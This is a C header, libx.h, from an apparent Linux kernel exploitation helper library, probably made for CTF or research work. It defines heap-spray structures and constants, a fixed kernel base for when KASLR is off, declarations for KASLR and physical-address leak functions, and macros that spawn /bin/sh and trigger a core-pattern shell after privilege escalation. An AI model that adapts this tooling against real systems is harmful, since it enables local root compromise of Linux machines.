-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlibx.h
153 lines (142 loc) · 3.59 KB
/
libx.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#define _GNU_SOURCE
#ifndef MYLIB_H
#define LIBX "v1.0"
#include <stdio.h>
#include <poll.h>
#include <fcntl.h>
#include <errno.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>
#include <unistd.h>
#include <signal.h>
#include <sys/un.h>
#include <assert.h>
#include <stdlib.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <pthread.h>
#include <keyutils.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>
#include <asm/prctl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <sys/timerfd.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <linux/socket.h>
#include <linux/if_packet.h>
#include <linux/userfaultfd.h>
#include <linux/pkt_sched.h>
#include <linux/rtnetlink.h>
#include <net/if.h>
// Definations
#define MSG_COPY 040000 /* copy (not remove) all queue messages */
#define TTYMAGIC 0x5401
#define PIPE_NUM 256
#define PAGE_SIZE 0x1000
#define SOCKET_NUM 0x200
#define unlikely(x) __builtin_expect(!!(x), 0)
#define SK_BUFF_NUM 0x40
#define MSGMNB_FILE "/proc/sys/kernel/msgmnb"
#define NO_ASLR_BASE 0xffffffff81000000
#define cloneRoot_FLAG CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND
#define OPTMEM_MAX_FILE "/proc/sys/net/core/optmem_max"
#define INITIAL_PG_VEC_SPRAY 0x200
#define KASLR 0xffffffff81000000ull //nokaslr value for debugging
#define MAGIC 0xFFFFFFFFDEADBEEFull
#define ELIBX 0x132
typedef __SIZE_TYPE__ size_t;
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef unsigned long long u64;
// typedef unsigned long long size_t;
// typedef size_t u64;
// Structs
typedef struct msgSpray_t {
struct msgSpray_t *next;
__u8 *ctx;
size_t size;
size_t num;
int msg_id;
} msgSpray_t;
typedef struct msgQueueMsg{
long mtype;
char mtext[1];
} msgMsg;
enum PG_VEC_CMD {
ADD,
FREE,
SHOW,
EDIT,
MAP,
EXIT
};
typedef struct
{
enum PG_VEC_CMD cmd;
int32_t idx;
size_t order;
union arg
{
size_t nr;
size_t offset; // show
}arg;
}ipc_req_t;
#define PGV_SHARE_AREA 0x13200000
#define FAIL_IF(x) if ((x)) { \
printf("\033[0;31m"); \
perror(#x); \
printf("\033[0m\n"); \
return -1; \
}
#define FAIL(x, msg) if ((x)) { \
printf("\033[0;31m"); \
printf("%s\n",msg); \
perror(#x); \
printf("\033[0m\n"); \
exit(-ELIBX); \
}
#define COREHEAD(argv) \
do { \
if (strncmp((argv)[0], "/proc/", 6) == 0) { \
coreShell(0); \
} else { \
strncpy((argv)[0], "n132", strlen((argv)[0])); \
(argv)[0][strlen("n132")] = '\0'; \
} \
} while (0)
#define CORETAIL(value) \
do { \
if (fork()) { \
crash(value); \
} else { \
system("/bin/sh"); \
} \
} while (0)
// Externel funcs
extern size_t leakKASLR();
extern size_t leakPHYS();
extern void * initFuse(void);
extern int sk_fd[SOCKET_NUM][2];
extern int pipe_fd[PIPE_NUM*4][2];
extern size_t user_cs, user_ss, user_rflags, user_sp;
// Export global vas
void shell(void);
// enum hfsc_class_flags {
// HFSC_RSC = 0x1,
// HFSC_FSC = 0x2,
// HFSC_USC = 0x4
// };
void libxInit(void );
// net related
#endif